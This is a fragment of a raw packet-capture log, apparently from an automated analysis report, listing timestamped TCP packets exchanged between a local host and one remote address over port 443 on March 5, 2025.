                                                                                                                                                                                                                                        Mar 5, 2025 12:47:28.794138908 CET44349714142.250.185.206192.168.2.5
                                                                                                                                                                                                                                        Mar 5, 2025 12:47:28.794161081 CET44349714142.250.185.206192.168.2.5
                                                                                                                                                                                                                                        Mar 5, 2025 12:47:28.794223070 CET49714443192.168.2.5142.250.185.206
                                                                                                                                                                                                                                        Mar 5, 2025 12:47:28.794241905 CET44349714142.250.185.206192.168.2.5
                                                                                                                                                                                                                                        Mar 5, 2025 12:47:28.794255018 CET49714443192.168.2.5142.250.185.206
                                                                                                                                                                                                                                        Mar 5, 2025 12:47:28.794281006 CET49714443192.168.2.5142.250.185.206
                                                                                                                                                                                                                                        Mar 5, 2025 12:47:28.794589996 CET44349714142.250.185.206192.168.2.5
                                                                                                                                                                                                                                        Mar 5, 2025 12:47:28.794605017 CET44349714142.250.185.206192.168.2.5
                                                                                                                                                                                                                                        Mar 5, 2025 12:47:28.794639111 CET49714443192.168.2.5142.250.185.206
                                                                                                                                                                                                                                        Mar 5, 2025 12:47:28.794642925 CET44349714142.250.185.206192.168.2.5
                                                                                                                                                                                                                                        Mar 5, 2025 12:47:28.794668913 CET49714443192.168.2.5142.250.185.206
                                                                                                                                                                                                                                        Mar 5, 2025 12:47:28.794683933 CET49714443192.168.2.5142.250.185.206
                                                                                                                                                                                                                                        Mar 5, 2025 12:47:28.795200109 CET44349714142.250.185.206192.168.2.5
                                                                                                                                                                                                                                        Mar 5, 2025 12:47:28.795214891 CET44349714142.250.185.206192.168.2.5
                                                                                                                                                                                                                                        Mar 5, 2025 12:47:28.795290947 CET49714443192.168.2.5142.250.185.206
                                                                                                                                                                                                                                        Mar 5, 2025 12:47:28.795295954 CET44349714142.250.185.206192.168.2.5
                                                                                                                                                                                                                                        Mar 5, 2025 12:47:28.795666933 CET44349714142.250.185.206192.168.2.5
                                                                                                                                                                                                                                        Mar 5, 2025 12:47:28.795687914 CET44349714142.250.